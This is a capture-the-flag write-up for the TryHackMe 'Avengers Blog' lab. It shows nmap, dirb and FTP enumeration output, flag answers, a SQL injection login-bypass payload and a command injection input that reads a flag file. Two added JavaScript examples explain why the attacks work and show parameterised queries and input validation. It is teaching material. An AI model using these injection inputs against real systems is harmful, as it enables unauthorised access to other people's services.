TryHackMe - Avengers Blog - Writeup

Avengers Blog

Learn to hack into Tony Stark’s machine! You will enumerate the machine, bypass a login portal via SQL injection and gain root access by command injection.

Nmap scan

root@ip-10-10-193-98:~# nmap -sCV -A 10.10.4.46 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-10 12:02 BST
Nmap scan report for ip-10-10-4-46.eu-west-1.compute.internal (10.10.4.46)
Host is up (0.00044s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a5:78:fc:a2:f9:6d:00:50:cf:92:7f:29:3f:9a:97:f0 (RSA)
|   256 21:a7:cc:07:08:53:5e:27:76:cb:33:9b:7b:3b:fb:5a (ECDSA)
|_  256 7d:02:3e:90:ca:dc:69:db:6a:54:0a:30:5b:dc:72:53 (EdDSA)
80/tcp open  http    Node.js Express framework
|_http-title: Avengers! Assemble!
MAC Address: 02:8C:13:DB:84:27 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/10%OT=21%CT=1%CU=42832%PV=Y%DS=1%DC=D%G=Y%M=028C13%T
OS:M=60C1F179%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10D%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=109%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=
OS:6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms ip-10-10-4-46.eu-west-1.compute.internal (10.10.4.46)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.51 seconds
root@ip-10-10-193-98:~# 

Directory Fuzzing

root@ip-10-10-193-98:~# dirb http://10.10.4.46/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jun 10 12:10:23 2021
URL_BASE: http://10.10.4.46/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.4.46/ ----
+ http://10.10.4.46/assets (CODE:301|SIZE:179)
+ http://10.10.4.46/css (CODE:301|SIZE:173)
+ http://10.10.4.46/home (CODE:302|SIZE:23)
+ http://10.10.4.46/Home (CODE:302|SIZE:23)
+ http://10.10.4.46/img (CODE:301|SIZE:173)
+ http://10.10.4.46/js (CODE:301|SIZE:171)
+ http://10.10.4.46/logout (CODE:302|SIZE:29)
+ http://10.10.4.46/portal (CODE:200|SIZE:1409)

-----------------
END_TIME: Thu Jun 10 12:13:47 2021
DOWNLOADED: 4612 - FOUND: 8
root@ip-10-10-193-98:~# 

Target: http://10.10.4.46/portal

Task 2:

On the Avengers machine you recently deployed, get the flag1 cookie value.

  • Answer: cookie_secrets

Task 3:

Look at the HTTP response headers and obtain flag 2.

Check the header of target URL http://10.10.4.46/

  • Answer: headers_are_important

FTP enumeration

root@ip-10-10-193-98:~# ftp 10.10.4.46
Connected to 10.10.4.46.
220 (vsFTPd 3.0.3)
Name (10.10.4.46:root): groot
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> help
Commands may be abbreviated.  Commands are:

!		dir		mdelete		qc		site
$		disconnect	mdir		sendport	size
account		exit		mget		put		status
append		form		mkdir		pwd		struct
ascii		get		mls		quit		system
bell		glob		mode		quote		sunique
binary		hash		modtime		recv		tenex
bye		help		mput		reget		tick
case		idle		newer		rstatus		trace
cd		image		nmap		rhelp		type
cdup		ipany		nlist		rename		user
chmod		ipv4		ntrans		reset		umask
close		ipv6		open		restart		verbose
cr		lcd		prompt		rmdir		?
delete		ls		passive		runique
debug		macdef		proxy		send
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Oct 04  2019 files
226 Directory send OK.
ftp> get files
local: files remote: files
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              33 Oct 04  2019 flag3.txt
226 Directory send OK.
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag3.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (15.6288 kB/s)
ftp> quit
221 Goodbye.
root@ip-10-10-193-98:~# 

Task 4:

Look around the FTP share and read flag 3!

Answer: Look around the FTP share and read flag 3!

Task 5:

What is the directory that has an Avengers login?

Answer: /portal

Task 6:

Use ' or 1=1-- in both the username and password fields.

Log into the Avengers site. View the page source; how many lines of code are there?

Answer: 223
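
The login bypass works because the portal builds its SQL statement by pasting the submitted fields into the query text. The following is an added example, not code from the room or from this writeup: since the Nmap output shows a Node.js Express server, it is written in JavaScript and contrasts a concatenated login query with a parameterised one. The table name, column names and both query builders are assumptions about what such a handler could look like, not the room's source. The tokenizer mimics what a database parser sees (string literals, "--" comments, and code), so the "shape" comparison shows exactly why ' or 1=1-- changes what the query does in the weak form and changes nothing in the parameterised form.

```javascript
'use strict';

// Added example, not code from the room or this writeup. The login is served by
// Node.js Express (see the Nmap output), so the comparison is written in
// JavaScript; the table name, column names and the two builders are assumptions
// about what such a login handler might look like, not the room's source.

// Splits a SQL statement into the pieces a database parser would see:
// 'string' literals (with '' as an escaped quote), '--' line comments, and
// everything else as 'code'. Only 'code' tokens change what the query does.
function tokenize(sql) {
  const tokens = [];
  let i = 0;
  let buf = '';
  const flush = () => { if (buf) { tokens.push({ type: 'code', text: buf }); buf = ''; } };
  while (i < sql.length) {
    const c = sql[i];
    if (c === "'") {
      flush();
      let j = i + 1;
      let lit = "'";
      while (j < sql.length) {
        if (sql[j] === "'") {
          if (sql[j + 1] === "'") { lit += "''"; j += 2; continue; } // escaped quote
          lit += "'"; j += 1; break;                                 // closing quote
        }
        lit += sql[j]; j += 1;
      }
      tokens.push({ type: 'string', text: lit });
      i = j;
    } else if (c === '-' && sql[i + 1] === '-') {
      flush();
      let end = sql.indexOf('\n', i);
      if (end === -1) end = sql.length;
      tokens.push({ type: 'comment', text: sql.slice(i, end) });
      i = end;
    } else {
      buf += c;
      i += 1;
    }
  }
  flush();
  return tokens;
}

// The weak pattern: user input is pasted into the statement text, so a quote
// in the input ends the literal and the rest of the input becomes SQL code.
function vulnerableLoginQuery(username, password) {
  return `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;
}

// The fix: the statement text is a constant with placeholders and the values
// travel separately; a driver binds them as data, never as SQL code.
function parameterisedLoginQuery(username, password) {
  return {
    sql: 'SELECT * FROM users WHERE username=? AND password=?',
    params: [username, password],
  };
}

// The "shape" of a query is its code tokens with whitespace collapsed. Two
// queries with the same shape do the same thing regardless of literal values.
function queryShape(sql) {
  return tokenize(sql)
    .filter((t) => t.type === 'code')
    .map((t) => t.text.replace(/\s+/g, ' ').trim())
    .filter(Boolean)
    .join(' ');
}

const EXPECTED_SHAPE = queryShape(vulnerableLoginQuery('tony', 'stark'));

// True when the supplied credentials change the structure of the concatenated
// query, i.e. when they are being interpreted as SQL rather than as data.
function altersQueryStructure(username, password) {
  return queryShape(vulnerableLoginQuery(username, password)) !== EXPECTED_SHAPE;
}

// The payload from this task, taken from the writeup's own hint.
const PAYLOAD = "' or 1=1--";

console.log('concatenated: ', vulnerableLoginQuery(PAYLOAD, PAYLOAD));
console.log('shape changed:', altersQueryStructure(PAYLOAD, PAYLOAD));
console.log('parameterised:', parameterisedLoginQuery(PAYLOAD, PAYLOAD));
```

In the concatenated form the tokenizer reports the code tokens "SELECT * FROM users WHERE username=" and "or 1=1" followed by a comment that swallows the password check, which is the whole WHERE clause collapsing to a tautology. In the parameterised form the SQL text is identical for every input, so there is nothing for the payload to alter; the same comparison also flags a legitimate name such as O'Brien, which is the usual sign that the concatenated version was broken long before anyone attacked it.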

Task 7:

Read the contents of flag5.txt

Use tac ../flag5.txt as the injected command.

Answer: d335e2d13f36558ba1e67969a1718af7
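
The flag is reachable because the page runs whatever is typed into the field as a command, and because nothing confines the file name to the directory the feature was meant to serve. The following is an added example, not the room's application code, of how a file-serving handler on a Node.js Express site can be written so that user input is never handed to a shell at all: the name is validated against an allowlist of published files, anything that looks like a path or shell syntax is refused with a reason that can be logged, and the content is looked up directly. The in-memory file store, the file names and the handler's name are constructed for this demonstration.

```javascript
'use strict';

// Added example, not the room's application code. The in-memory store and the
// file names below are constructed for this demonstration.

// A plain file name only: letters, digits, underscore, dash, one extension.
// No slashes, no leading dot, no spaces, no shell syntax.
const SAFE_NAME = /^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?$/;

// Stand-in for the directory the feature is allowed to serve. Because the
// handler looks names up here, the list is also the access-control boundary:
// a file that is not published cannot be requested, whatever its real path.
const PUBLIC_FILES = new Map([
  ['welcome.txt', 'Welcome to the Avengers blog.'],
  ['schedule.txt', 'Team meeting at 0900.'],
]);

// Validate a requested name and say why it was refused, so rejections can be
// logged and alerted on. Checks run from most to least specific.
function checkRequestedName(name) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 64) {
    return { ok: false, reason: 'missing or oversized name' };
  }
  if (name.includes('/') || name.includes('\\') || name.includes('..')) {
    return { ok: false, reason: 'path traversal characters' };
  }
  if (/[\s;|&$`<>(){}]/.test(name)) {
    return { ok: false, reason: 'shell metacharacters or whitespace' };
  }
  if (!SAFE_NAME.test(name)) {
    return { ok: false, reason: 'name outside allowed character set' };
  }
  if (!PUBLIC_FILES.has(name)) {
    return { ok: false, reason: 'not a published file' };
  }
  return { ok: true, reason: 'ok' };
}

// The hardened handler. There is no command line for the input to land in:
// the name is checked, then used as a lookup key. If a real process were ever
// required, the same validated name would be passed as a separate argument
// (child_process.execFile style), never interpolated into a shell string.
function serveFile(name) {
  const check = checkRequestedName(name);
  if (!check.ok) {
    return { status: 400, body: `rejected: ${check.reason}` };
  }
  return { status: 200, body: PUBLIC_FILES.get(name) };
}

// Walk-through with a published name and the inputs from this task.
for (const requested of ['welcome.txt', 'flag5.txt', '../flag5.txt', 'tac ../flag5.txt']) {
  const res = serveFile(requested);
  console.log(JSON.stringify(requested), '->', res.status, res.body);
}
```

The ordering matters for the audit trail: a request containing "../" is reported as traversal before anything else, so the log line names the actual problem rather than a generic character-set failure. Keeping the allowlist as the final gate means that even a perfectly well-formed name for a file outside the published set (flag5.txt in the walk-through) gets a 400, which is the defence-in-depth that a pure regex check does not give.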

Thanks for reading

Room link: Avengers Blog

Written on June 10, 2021